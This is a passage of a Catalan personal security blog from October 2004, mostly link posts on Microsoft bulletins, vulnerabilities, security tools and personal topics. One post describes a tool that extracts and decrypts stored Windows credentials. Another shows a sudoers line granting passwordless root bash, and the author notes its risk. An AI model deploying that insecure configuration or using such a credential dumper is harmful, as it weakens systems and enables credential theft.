 Publicada la versió 2.2 del projecte OpenPKG, un sistema estandarditzat per a la instal·lació de programes de codi obert disponible per a nombrosos sistemes operatius: FreeBSD, NetBSD, Solaris, Linux (Debian, RedHat, Fedora Core, SuSE, Gentoo, Mandrake) i HP-UX.
|
21:13 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Esborrany de la guia del NIST: Recommended Security Controls for Federal Information Systems. Les recomanacions de seguretat que han d'aplicar-se als ordinadors del govern dels Estats Units. S'especifiquen els procediments periòdics de valoració del risc, les polítiques i procediments basts en els riscos identificats i els plans subordinats per aplicar les mesures de seguretat a les xarxes, edificis i sistemes d'informació.
|
21:05 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Car Crazy: Microsoft in the driver's seat. Sembla que Microsoft vol entrar al món dels automòbils que s'encarregarà de controlar-ho tot:
It's no joke. The world's largest software company is revving up to position itself as the largest supplier of software to car manufacturers, with a custom version of Windows CE controlling everything from in-vehicle entertainment to satellite navigation.
 Al final, no tenir carnet de conduir serà una cosa bona...
|
20:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 20 / octubre / 2004 |
A partir d'avui, deixo de mantenir les diverses categories separades ja que trobo no tenia massa sentit duplicar el contingut i la seva existència m'auto-obligava a publicar coses. Seguiré no obstant tractant els mateixos temes, encara que ja no tindran les seves seccions separades.
|
09:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[eWeek] Special Report: Advances in Web Browsers. Tot el que està succeint al voltant dels navegadors i com hi ha alternatives viables a l'Internet Explorer.
|
07:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft] Securing Windows 2000 Server. Guia de Microsoft sobre com enfortir la configuració de les màquines Windows 2000 Server. Addicionalment es tracta de temes com la gestió d'actualitzacions, auditoria, detecció d'intrusions i resposta a incidents.
|
06:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[iDefense] Multiple Vendor Anti-Virus Software Detection Vulnerability. Descoberta una vulnerabilitat a diversos programes antivirus (McAfee, Computer Associates, Kaspersky, Sophos, Eset i RAV) que pot ser utilitzada de forma remota per saltar-se la detecció de virus. El problema es troba en l'anàlisi dels fitxers ZIP: si la capçalera indica que el fitxer té una mida de 0 bytes, l'antivirus no analitza el fitxer.
|
06:49 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Magic Codes, un programa bàsic per a la codificació de text utilitzant mecanismes bàsics (XOR, ROT, xifrat Vigenere, MD5...). Disponible per a Windows, Mac OS X i Unix/Linux. Inclou el codi font.
|
06:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 19 / octubre / 2004 |
[La Malla] L'Audiència Nacional investiga, per un presumpte delicte de terrorisme, un noi de Lloret de Mar (la Selva) per enviar tres correus electrònics a tres grans empreses demanant que etiquetessin els seus productes en català.
El noi signava els missatges com «l'Exèrcit del Fènix». Pel que sembla a l'Audiència Nacional no són lectors de Harry Potter.
Actualització: A Racó Català, el «terrorista», de només catorze anys, explica el que va succeir.
|
20:30 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Barrapunto] Sisa y lo que queda de su «viva la libertad». Diumenge Jaume Sisa, el cantautor galàctic, publicava un article d'opinió a «La Vanguardia» (requereix subscripció) on intentava demostrar les incoherències de la lliure distribució de continguts... quan en realitat el que ha fet és retratar-se i caure en el més profund dels ridículs. Algunes frases destacades:
Las figuras del pop y la cantautoría llenarán los estadios y ahí no habrá taquilla que valga. Las plantillas del Real, del Liceu y los auditorios los mantendrán en perfecto estado de conservación, motivados tan sólo por la pasión de la música en libertad, como un servicio al pueblo. Los músicos y todo aquel que de una u otra manera dependa laboralmente de esta actividad podrán frecuentar los bares, restaurantes y hoteles sin tener que abonar la cuenta. Y Bill Gates regalará los ordenadores y accesorios pertinentes para copiar y bajarse música, y sus empleados obtendrán gratuitamente la comida, la ropa y la vivienda, con lo que ello significa y la repercusión que tendrá en la economía.
Y así, sucesivamente, se irá destejiendo la red hasta llegar a poner el mundo patas arriba. El momento ha llegado. Gracias a la tecnología digital será posible lo que ni la Revolución Francesa, ni la República española, ni el Soviet Supremo, ni el Mayo del 68 hicieron realidad. Nosotros tenemos una nueva oportunidad para materializar la Arcadia soñada.
¿Vamos a ir a por todas o sólo queremos música gratis?
|
15:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[LaMalla] El pa amb tomàquet arriba al Vietnam... de fet és un restaurant català.
Quan viatjo acostumo a fugir de les visites als restaurants espanyols i catalans, però recordo una vegada a Washington DC on vaig anar amb uns amics al restaurant «català», on el concepte que tenien de pa amb tomàquet era bastant diferent i dubto que cap català tingués la barra de poder anomenar-lo d'aquesta forma. No, no arribava a l'extrem de substituir el pa amb ketchup, però gairebé.
|
14:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Credential Manager Password Dumper és una eina que permet extreure les contrasenyes emmagatzemades al gestor d'identitats de Windows Server 2003 i Windows XP. Aquests sistemes emmagatzemem les credencials (usuari i contrasenya) utilitzats per l'accés a recursos de la xarxa, per tal d'oferir un servei d'identificació global (Single Sign-On), que van des de la identificació de servidor, les contrasenyes de Passport, les credencials amb servidors intermedis...
Aquesta eina permet extreure les contrasenyes emmagtzemades i desxifrar-les.
|
13:10 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft Monitor] New Windows Server Roadmap. Fidel a la seva política de vendre fum i vaporware, per evitar que surtin alternativa, Microsoft informa del calendari de noves versions de Windows:
| Segona meitat de 2004 |
Versions beta de Service Pack 1 de Windows Server 2003 i de la versió de 64-bit de Windows Server 2003 |
| Primera meitat de 2005 |
Versions finals del Service Pack 1 de Windows Server 2003 i de la versió de 64-bit de Windows Server 2003
Actualització de Windows Update |
| Segona meitat de 2005 |
Windows Server 2003 R2, Windows Storage Server R2, Windows Server 2003 High Performance Edition i primera beta de Windows «Longhorn» |
| Any 2006 |
Service Pack 2 de Windows Server 2003 i segona beta de Windows «Longhorn» server |
| Any 2007 |
Windows «Longhorn» Server |
En la tradició de Microsoft caldrà afegir un mínim de dotze mesos a totes aquestes dates.
|
12:45 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsiervos] 430.000 personas de todo el mundo vive de eBay
Loïc Le Meur [si el enlace está roto prueba en la portada] comenta una actualización a uno de los datos más impresionantes (y menos conocidos, diría yo) de las empresas de Internet a nivel mundial:
"430.000 personas en todo el mundo viven de los beneficios que obtienen en eBay." És a dir, gairebé mig milió de persones d'arreu del món viuen d'allò que guanyen venent a través d'eBay... i si eBay tanqués es quedarien sense feina ni calers.
|
04:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
RotoRouter 1.0
RotoRouter v1.0 (pronounced row-toe row-ter) by Richard Thomas (Humble). A program for logging and faking the standard unix udp-based traceroute.
|
04:37 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[NetworkWorldFusion] Oracle warns of exploits for latest DB flaws. Oracle recorda als seus usuaris d'aplicar els pegats publicats el passat mes d'agost, ja que està circulant codi malèvol que s'aprofita de les mateixes per atacar els servidors de base de dades vulnerables.
|
04:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Fyodoor ha publicat una nova versió de l'Nmap. Aquesta versió 3.75 suposa una gran actualització de la base de dades per a la identificació de sistemes operatius (OS Fingerprinting), de forma que ara permet identificar les últimes versions d'OpenBSD, Windows XP i la versió de Windows Longhorn que circula pels llocs pirates.
També aquesta versió soluciona problemes d'estabilitat a la versió per a Windows, entre d'altres canvis menors.
|
04:10 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 18 / octubre / 2004 |
[via Catux] Taula comparativa de les característiques de les diverses alternatives existents per a la creació de VPN (xarxes privades virtuals) amb software lliure.
|
12:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Tot començant a pensar que cal votar en el referèndum sobre el projecte de Constitució Europea, veient articles com aquest el meu vot ha de ser necessàriament contrari:
Article I.5 - Relaciones entre la Unión y los Estados miembros
Punt 1. (...) Respetará las funciones esenciales del Estado, especialmente las que tienen por objeto garantizar su integridad territorial (...).
|
10:01 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft] The Security Risk Management Guide. Guia de Microsoft per ajudar en la planificació, confecció i manteniment dels programes de gestió del risc informàtic. La guia explica, entre d'altres coses, el procés per tal de mesurar el nivell de risc i, en cas que sigui un nivell acceptable, les mesures a prendre per tal de controlar-lo.
|
07:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Tne New York TImes] Google Envy Is Fomenting Search Wars. Article de John Markoff sobre el moviment que hi ha al voltants dels cercadors...
Google's urgency in releasing a desktop search program shows that it knows the fight over search is moving to new ground.
|
07:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
DSPAM és un sistema de filtrat del correu electrònic per a la identificació de correu brossa, de codi obert. Està especialment indicat per a la instal·lació en xarxes amb un gran nombre de nodes. Una altra característica destacable és la facilitat d'ús per part de l'usuari final i l'automatització de tots els processos.
|
07:05 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] Gmail Begins Signing Email with Domainkeys. Els missatges de GMail ja porten, dins de la capçalera, la proposta de Yahoo! per a la lluita contra el correu brossa: les DomainKeys
DomainKeys is a technology proposal that can bring black and white back to this decision process by giving email providers a mechanism for verifying both the domain of each email sender and the integrity of the messages sent (i.e,. that they were not altered during transit). And, once the domain can be verified, it can be compared to the domain used by the sender in the From: field of the message to detect forgeries. If it's a forgery, then it's spam or fraud, and it can be dropped without impact to the user. If it's not a forgery, then the domain is known, and a persistent reputation profile can be established for that sending domain that can be tied into anti-spam policy systems, shared between service providers, and even exposed to the user Ho acabo de provar i he vist que el missatge inclou això:DomainKey-Signature: a=rsa-sha1; c=nofws;
s=beta; d=gmail.com;
h=received:message-id:date:from:
reply-to:to:subject:mime-version:
content-type:content-transfer-encoding;
b=HrcqV3j3u+neIkCr(...)bCMvso
El contingut de b és la clau del domini, que he retallat.
|
06:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[BugTraq] Possible URL Spoofing. Un nou mètode per fer que l'Internet Explorer mostri a la barra d'adreces una URL diferent a la del contingut de la pàgina.
|
06:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 17 / octubre / 2004 |
Els que com jo van ser usuaris de l'OS/2 segur que tenen els mateixos bon records pel llenguatge de programació REXX, per la seva facilitat d'ús i potència.
Doncs bé, he vist a la web de la REXX Language Association que IBM ha cedit la versió orientada a objectes, l'Object REXX, a la comunitat per tal de convertir-lo com un producte de codi obert, alhora que el retira de la seva web com a producte comercial.
Object REXX està actualment disponible per a Windows, AIX, OS/2, Linux i Solaris.
|
23:08 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Matrixdump, visualitza el tràfic de la xarxa a l'estil «Matrix». Visualitza el protocol, les adreces IP i el número de port, caient verticalment. Requereix pcap, libdnet i ncurses.
|
18:24 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Al patí de casa hi ha una escala que comunica amb un petit terrat. La barana d'aquesta escala està totalment recoberta per una planta que justament per aquesta època està florida. Una exuberant floració d'unes flors molt petites i que desprenen una olor especialment intensa i agradable. Fins aquí tot perfecte.
El problema es que aquesta olor no només m'agrada a mi. Pateixo una autèntica invasió d'abelles que s'acosten a les flors per tal de xuclar el nèctar. No estic dient una, dues, deu o vint abelles... estic dient que simultàniament hi poden haver aproximadament un centenar d'abelles donant voltes damunt la planta.
He passat bona part del migdia assegut al patí mirant com treballaven les abelles; com sobrevolaven les flors i com les seves potes s'anaven omplint de pol·len... un espectacle del tot relaxant.
Ara bé, he estat incapaç de pujar per l'escala. Segurament ha de ser un trauma de la meva infantesa. Recordo haver patit algunes picades de vespa especialment doloroses.
|
15:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Ho explica Fernand0: Howard Rheingold vindrà a Catalunya a presentar el seu llibre Smart Mobs: The Next Social Revolution amb motiu de l'edició en castellà.
Vindrà el dia 28 a Barcelona, dins de l'«ArteFutura» amb la conferència: «Multitudes inteligentes: El poder de las masas móviles» (de 20.00 a 21.00 hores). L'endemà serà a Vic (de 12.00 a 14.00) per pronunciar la conferència «Smart Mobs, Multituds Intel·ligents» dins de l'eWeek (la setmana digital). A Vic també hi serà el José Luis Orihuela, d'eCuardeno, el dimarts 26 fent un taller sobre el món del weblogs.
Smart Mobs tracta sobre com la tecnologia afavoreix la interacció en formes possiblement no sospitades, proporcionant a la gent noves formes de comunicar-se. Es parla de l'ús dels telèfons mòbils, les comunitats virtuals, les xarxes P2P, la integració dels ordinadors en la nostra vida diària, l'evolució de la reputació dins d'un món digital, els serveis de localització com RFID, les xarxes sense fils, la coordinació de grups utilitzant les possibilitats que ofereixen les noves tecnologies...
En Fernand0, quan va parlar sobre el llibre, va arribar a aquesta conclusió:
En definitiva, un libro que me ha gustado bastante. Si yo fuera un empresario movilisto, o un empresario internáutico, haría todo lo posible para que se tradujera este libro a nuestro idioma, y regalaría el capítulo que más se parezca al asunto de mi negocio, como parte de la publicidad.
(...)
Cuando la lei, estaba en el tren, viajando a Burgos. Ya se que les parecerá tonto, pero tuve que pararme un rato, porque me dejó realmente impactado.
|
13:54 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 16 / octubre / 2004 |
[Via Juantomás García] Hackeando la «Sociedad de la Información».
Una nueva lucha está en marcha y se está dando en espacios distribuidos del planeta. Es una lucha desigual y más compleja que cualquier otra lucha que el ser humano haya batallado en siglos anteriores.
(...)
Este trabajo pretende ser un análisis descriptivo de la situación, pero no puede evitar una posición política. Y mucho menos puede evitar el marco en el que surge, un marco de discusión internacional abierta sobre el control del conocimiento y rol de los hackers, el movimiento de software libre y sus posiciones frente al proyecto de sociedad de la información del G8, un marco donde está más clara que nunca la disputa entre el concepto de "sociedad de la información" frente al proyecto de "Sociedades del conocimiento libre".
|
21:58 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Panda] Un mensaje ofrece supuestas fotografías de David Beckham como señuelo para descargar un troyano.
PandaLabs ha detectado la presencia, en varios grupos de noticias de Internet, de un mensaje que ofrece fotografías de un supuesto romance protagonizado por el futbolista David Beckham. Dicho mensaje incluye un link a una dirección desde donde -presuntamente- pueden obtenerse las imágenes; sin embargo, lo único que se descarga en el sistema es un archivo conteniendo un troyano denominado HackArmy.A, detectado en diciembre de 2003.
|
18:21 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 15 / octubre / 2004 |
Fins ara, sempre que m'havia de fer root a la meva màquina, utilitzava el clàssic su -
El problema evident d'això és que cal introduir la contrasenya de l'administrador, que evidentment no es fàcil d'escriure. He decidit crear-me un petit script per obtenir les credencials d'administrador, utilitzant sudo:sudo -u root /bin/bash --init-file
/root/.bash_profile
És ben simple: executa un bash (amb les definicions incloses al .bash_profile de root) que té els privilegis de root.
L'exemple pràctic[xcaballe@heli xcaballe]$ root
(root@heli:xcaballe)#
Evident això implica que qualsevol persona amb accés a les meves credencials d'usuari ho té fàcil per fer-se root...
Actualització Per aclarir-ho, arran del comentari que ha deixat en Pau, el fitxer /etc/sudoers conté aquesta línia per tal que el meu usuari no necessiti introduir contrasenya per fer-se root:xcaballe heli = NOPASSWD: /bin/bash
|
11:21 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Martin McKeay] Hand-Out for Security. Els quatre programes bàsics per portar en un mini-CD quan ens toca anar a visitar un amic o company de feina per solucionar-li algun problema de seguretat: AVG Anti-Virus, Ad-Aware, Tiny Firewall i Firefox.
Els motius d'utilitzar un mini-CD?
I prefer the small disks because they're a lot more unobtrusive and easier to carry around in my work bag. These disks also seem to be less intimidating to some people, if only for purely psychological reasons.
|
11:06 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Netcraft] Latest IE Flaws Provide Opportunity for Phishers. La vulnerabilitat MS04-038 presenta una sèrie de vulnerabilitats de suplantació que poden ser aprofitades per a la realització d'una nova onada d'atacs phishing.
One approach allows a plugin, such as an Active X control, to instruct the browser to display a false URL in the address bar.
(...)
A separate but similar address bar spoofing flaw exists only in computers using double-byte character sets, usually found in Asian versions of Windows.
(...)
Netcraft has developed a service to help banks and other financial organizations identify sites which may be trying to construct frauds, identity theft and phishing attacks by pretending to be the bank, or are implying that the site has a relationship with the bank when in fact there is none.
|
04:50 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 14 / octubre / 2004 |
[Barrapunto] El debate presidencial sobre seguridad informática. Parodia d'un suposat debat entre Bush i Kerry sobre seguretat informàtica.
Bush:
The American people want a president who is consistent and decisive. Not one who flip flops. First you say you have a four step plan. Then you have a five step plan. What hacker will be convinced to stop hacking by a president who can’t count? My plan is a real plan. We stopped the legal action against Microsoft, leaving them free to innovate. That’s the American way. Innovation. We won’t let the government use open source – people contributing to a common code base? That’s communism.
|
06:48 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
The Bleeding Edge of Snort, una web imprescindible pels usuaris del sistema de detecció d'intrusions SNORT. Es tracta d'un portal on es reuneix tota la informació sobre l'SNORT, com noves regles com, per exemple, la detecció de les vulnerabilitats a ASP.NET, detecció d'atacs de denegació de servei, utilització d'exploits de l'Internet Explorer, l'Internet Information Server o el SQL Server.
|
06:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La vulnerabilitat MS04-034 correspon a un desbordament de memòria intermèdia en el suport de fitxers ZIP de Windows XP (fins al Service Pack 1) i Windows ME. La vulnerabilitat es troba a DUNZIP32.DLL, el mòdul que integra la visualització dels fitxers ZIP com a carpetes.
Quan un fitxer ZIP conté un fitxer amb un nom molt llarg (més de 8.000 caràcters, incloent la via d'accés) es produeix el desbordament de memòria, que permet sobreescriure el controlador d'excepcions i prendre el control de l'EIP.
Podeu trobar més detalls sobre aquesta vulnerabilitat al butlletí publicat per eEye.
Recorda molt a la vulnerabilitat dels fitxers JPEG (MS04-028), ja que pot ser utilitzada per permetre a un atacant remot prendre el control dels sistemes vulnerables.
|
06:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 13 / octubre / 2004 |
Avui «El Periódico» publica una mini-columna sobre els programes espies que he escrit jo. L'hi han ficat com a títol: «¿A vostè li importa, o no?», encara que el títol original era «Nou de cada deu ordinadors...»
El podeu veure en català i castellà
|
07:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Avui he hagut d'enviar un fitxer .ZIP i m'he dit... ves, fes-ho des de Gmail.
Quina ha estat la meva sorpresa en veure que no m'ha deixat:
Malgrat que la captura de pantalla no es veu bé del tot (l'he reduïda a la mida de la capsa de text) l'error és: Sorry, for security reasons, Gmail does not allow you to send this type of attachment.
Només em passa a mi?
|
00:14 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 12 / octubre / 2004 |
Avui és el segon dimarts de mes i toca la publicació d'actualitzacions de Microsoft... i s'han lluït: deu butlletins de seguretat, set dels quals són crítics:
| Butlletí MS04-038 |
Actualització acumulativa per a l'Internet Explorer, versions 5.01, 5.5 i 6. Inclou la solució de vuit vulnerabilitats, la majoria de les quals es consideren crítiques doncs permeten l'execució de codi remot. |
Crític |
| Butlletí MS04-037 |
Vulnerabilitat a Windows Shell, que pot ser utilitzada per a l'execució de codi per part d'atacants remots. Afecta a Windows NT 4.0, Windows 2000, Windows Server 2003 i Windows XP (no afecta al Service Pack 2 de Windows XP). |
Crític |
| Butlletí MS04-036 |
Vulnerabilitat a la implementació del protocol NTTP (grups de notícies d'Internet) de Microsoft. Pot ser utilitzada per un atacant remot per tal d'executar codi remot als servidors vulnerables. Afecta a les implementacions del protocol NTTP incloses a Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange Server 2000 i Exchange Server 2003. |
Crític |
| Butlletí MS04-035 |
Vulnerabilitat a la implementació del protocol SMTP (correu electrònic d'Internet) de Microsoft. Pot ser utilitzada per un atacant remot per tal d'executar codi remot als servidors vulnerables. Afecta a les implementacions del protocol SMTP incloses a Windows XP, Windows Server 2003 i Exchange Server 2003. |
Crític |
| Butlletí MS04-034 |
Vulnerabilitat a les carpetes comprimides (ZIP) de Windows XP, pot permetre a un atacant aconseguir l'execució de codi als sistemes vulnerables. |
Crític |
| Butlletí MS04-033 |
Vulnerabilitat a Microsoft Excel que pot permetre l'execució de codi de forma remota. Afecta a Excel 2000, Excel XP, Excel 2003, Excel 2001 per a Mac i Excel v. X per Mac. |
Crític |
| Butlletí MS04-032 |
Actualització acumulativa per a Microsoft Windows (NT 4.0, Windows 2000, Windows XP i Windows Server 2003; no afecta a Windows XP amb Service Pack 2. Inclou la solució de quatre vulnerabilitats que es consideren crítiques a Windows 2000, XP i Server 2003. |
Crític |
| Butlletí MS04-031 |
Vulnerabilitat al component NetDDE de Windows (versions 98, ME, NT 4.0, Windows 2000, Windows XP i Windows Server 2003; no afecta a Windows XP amb Service Pack 2). Pot permetre l'execució de codi remot als sistemes vulnerables. |
Important |
| Butlletí MS04-030 |
Vulnerabilitat al gestor de missatges XML de WebDAV, que pot ser utilitzada pe Microsoft Excel que pot permetre l'execució de codi de forma remota. Afecta a Excel 2000, Excel XP, Excel 2003, Excel 2001 i Excel v. X per Mac. |
Important |
| Butlletí MS04-029 |
Vulnerabilitat a la biblioteca RPC que pot ser utilitzada per a la divulgació d'informació i també la realització d'atacs de denegació de servei. Afecta a Windows 2000, Windows XP (inclòs el Service Pack 2), Windows Server 2003, Windows 98 i Windows ME Windows NT 4.0. |
Important |
També publicat a Hispasec: Avalancha de boletines de seguridad de Microsoft en octubre.
|
21:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
L'últim cap de setmana d'octubre se celebrarà a Sevilla (Andalusia) la cinquena edició del Hackmeeting, una trobada organitzada per la pròpia comunitat d'usuaris d'Internet on es tracten de temes polítics, socials i tecnològics.
Continuació...
|
19:54 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Per cinquè any consecutiu, SANS Institute presenta una nova edició de la seva guia sobre "les 20 vulnerabilitats de seguretat més crítiques en Internet". Amb el temps, aquesta guia s'ha convertit en una autentica guia de referència sobre els problemes de seguretat més habituals i que acostumen a ser els utilitzats pels cucs i virus de propagació massiva.
Continuació...
|
19:37 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Softcatalà ha publicat una versió de prova, a l'abast de tothom, de les edicions en català del Mozilla 1.7.3, el Firefox 1.0PR (0.10.1) i del Thunderbird 0.8, per als entorns Windows i Linux.
|
11:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[BBC] 'New' giant ape found in CR Congo. Una nova espècia de primat detectada a la selva de l'Àfrica Central. Les seves característiques més destacades són una cara sembla a la dels goril·les, una gran alçada (2 metres), un pes considerable (85-102 Kg), un comportament semblant als goril·les (les femelles fan nius al terra) i una dieta semblant als ximpanzés (rica en fruita).
According to local villagers, the apes are ferocious, and even capable of killing lions.
|
08:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] New IM Worm On The Loose: Funner, un cuc que es distribueix a través del MSN Messenger. Modifica el fitxer HOSTS per tal de rediccionar peticions a determinades pàgines a un ordinador sota control dels autors del cuc. El cuc es distribueix a tots els contactes d'una persona infectada
|
08:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Sans Institute ofereix una versió web de la utilitat per detectar els sistemes vulnerables a la vulnerabilitat JPEG (MS04-028). És un control ActiveX i per tant únicament funciona amb l'Internet Explorer. Jo l'he provat amb l'Internet Explorer del Service Pack 2 i no m'ha funcionat (diu que el control ActiveX no està signat de forma adequada).
|
08:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
SysInternals, autors d'algunes de les eines més útils per a l'administració de sistemes Windows (Process Explorer, TCPview, PsTools...), ofereix les seves novetats a través d'una font RSS.
|
07:10 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
És ben fàcil. Només cal fer aquests tres passos:
- A l'escriptori, crear un nou accés directe: Fer clic amb el botó dret i seleccionar Nou -> Accés directe.
- A la ubicació, indicar %windir%\system32\rundll32.exe user32.dll,LockWorkStation.
- Donar-hi un nom... per exemple: Bloqueig de l'estació.
Fent clic damunt d'aquest accés directe podrem bloquejar l'estació de treball, sense necessitat d'utilitzar el teclat.
|
07:01 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 11 / octubre / 2004 |
[Linux Gazette] Intrusion Detection with Tripwire. Tripwire és segurament el sistema de detecció d'intrusions a nivell host més popular als sistemes Unix. Permet detectar canvis als fitxers que s'estan monitoritzant.
A little over two years ago I was hacked. Someone broke into a web server I was administrating that had only Apache and OpenSSH running publically, and all packages were up-to-date. The hacker replaced my ps binary with his own to hide his processes, added a new service that was executed from the binary "/bin/crond " (the space is intentional - it makes it look like a normal and an expected process in a running-processes listing and a normal binary in a directory listing). The "crond " process gathered usernames and passwords and stored them in a text file in the directory "/dev/pf0 / /", (5 and 2 spaces respectively), which also contained a root shell. The chances of me finding and identifying this intrusion would have been extremely remote if I had not been running Tripwire.
Tripwire is a file integrity checker for UNIX/Linux based operating systems and works as an excellent intrusion detection system.
|
07:37 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La revista Maxim (que, definitivament, no és un lloc habitual per obtenir informació sobre tecnologia i Internet) ha realitzat una enquesta on es formula una interessant pregunta: si tinguessis l'oportunitat, llegirien el correu electrònic del teu company? El 37% no faria fàstics a mirar el contingut de la seva bústia i un 28% no dubtaria pas a veure els missatges que semblin sospitosos. El mateix percentatge, un 28%, creu que accedir al correu electrònic d'una altra persona és una cosa negativa i... un 6% de les dones són partidàries d'implantar un xip al cervell del seu company per saber en que pensa.
|
06:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[MSNBC] Security firms claims 120 milions accounts compromised this year. L'any passat es van detectar seixanta milions d'intents d'ús fraudulent de targetes de crèdit i es calcula que enguany el nombre es doblarà. Aquestes dades les ha facilitat una empresa que es dedica a oferir serveis de seguretat als comerços, però segons Visa, Mastercard i American Express el consideren una exageració.
|
06:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] Goodbye SNMP? parla sobre WS-Management, una especificació que han creat Microsoft, Intel, AMD, Dell i Sun d'un protocol de gestió pensat per substituir el SNMP.
|
06:25 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
GMail Drive Shell Extension, permet utilitzar el compte de correu com una unitat de disc d'una màquina Windows amb Internet Explorer 5 o posterior. Està basat en el GmailFS (el mateix, però per a sistemes Linux).
|
06:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 10 / octubre / 2004 |
[Vilaweb] El govern espanyol torna a dedicar més diners a recerca militar que no a recerca bàsica
Al projecte de Pressupostos Generals de l'Estat per l'any 2005, les partides destinades explícitament a R+D militar sumen 1.330,3 milions d'euros (221.343 milions de pessetes), la qual cosa representa quasi el 27% del total de fons per a R+D pressupostats per l'Estat per al proper any. En canvi, el programa que constitueix la principal font de finançament públic per als grups de recerca de les universitats i el CSIC, tan sols reben el 9,9% del total de la despesa en R+D pressupostats i, tot i que augmenta en xifres absolutes respecta l'any passat, el seu pes relatiu s'ha retallat (suposava el 10,4% el 2004). Els fons dedicats a R+D militar podrien ser encara més grans, doncs el projecte de Pressupostos no deixa clar la destinació (civil o militar) d'uns altres 307,3 milions d'euros i, així, la participació real dels projectes militars en les despeses de R+D podria arribar al 33%.
(...)
Cal destacar que, segons el darrer informe publicat per l'OCDE, l'Estat espanyol és el segon estat desenvolupat que més esforç dedica al desenvolupament de nous armaments, superat només pels EE.UU.
|
23:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Dos dies i mig; dos dies i mig laborables... el que vol dir que una part significativa d'aquest període no l'he dedicat a la lectura. Aquest ha estat el període de temps en que he llegit «Àngels i dimonis».
Malgrat que arriba en versió catalana amb posterioritat al «El codi Da Vinci» i que s'ha associat directament amb el mega-èxit editorial, l'únic punt en comú entre els dos llibres és la presència del protagonista central, en Robert Langdon. La resta de la història, si bé l'argument recorda molt (ja que tampoc no es tan original), no té res a veure.
En aquesta ocasió la història comença amb un assassinat on surt un símbol estrany, que sembla apuntar a una mena de secta que té com objectiu combatre l'església catòlica. A partir d'aquí comencen una apassionant visita a tota mena de criptes, catacumbes i catedrals per tal de descobrir on s'amaga aquesta gent, que passa per ser el lloc més amagat del planeta.
«Àngels i dimonis» no enganyarà a ningú. Si no us ha agradat «El codi Da Vinci», en aquest llibre no hi trobareu res a destacar. Si per contra us va agradar, aquest segurament el trobareu força més interessant i d'una lectura molt més intensa.
Títol: Àngels i Dimonis («Angels & Demons»)
Autor: Dan Brown. Traducció d'Anna Turró i David Guixeras
Editorial Empúries
574 pàgines
1a edició (setembre 2004)
ISBN 84-9787-047-6
|
19:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Techworld] Companies risk security by not introducing wireless. El gran risc de les comunicacions sense fils, des del punt de vista de la seguretat és la facilitat amb que pot fer la instal·lació. El gran risc doncs, es que la instal·lació no estigui sota el control del departament de seguretat i la configuració no sigui la més adequada.
De fet no es un fet estrany trobar-se empreses on hi ha un punt d'accés obert que «ningú» n'era conscient... i sovint sense cap mena de protecció.
|
19:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
F-Secure publica una eina que permet identificar la presència del cuc Cabir als telèfons mòbils Nokia de la sèrie 60:
Com podeu veure, l'eina també permet esborrar-lo.
|
18:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 El sisè número de la revista «Hakin9» inclou els següents articles:
- Ataque DDoS, teoría y práctica. Introducció bàsica als conceptes associats als atacs distribuïts de denegació de servei.
- Uso impropio de Usenet. Explicació del protocol NNTP i com aprofitar-se d'errors de configuració per fer tasques com la creació de nous grups.
